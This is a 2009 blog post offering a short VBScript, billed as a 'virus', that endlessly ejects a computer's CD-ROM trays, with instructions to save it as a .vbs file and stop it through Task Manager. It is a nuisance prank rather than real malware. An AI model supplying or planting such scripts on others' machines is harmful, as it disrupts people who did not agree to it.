Wednesday, December 30, 2009

A virus that open and close CD ROM-alternately

FOR EDUCATION PURPOSE ONLY...

DONT USE TO HARM ANY ONE...

A virus which opens and closes CD rom
Copy the follwing code in note pad and save it with extension .vbs


'code start from here
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
'code end from here

to end it go to taskmanager then
processes tab then end the wscript
Digg Google Bookmarks reddit Mixx StumbleUpon Technorati Yahoo! Buzz DesignFloat Delicious BlinkList Furl

0 comments: on "A virus that open and close CD ROM-alternately"

Post a Comment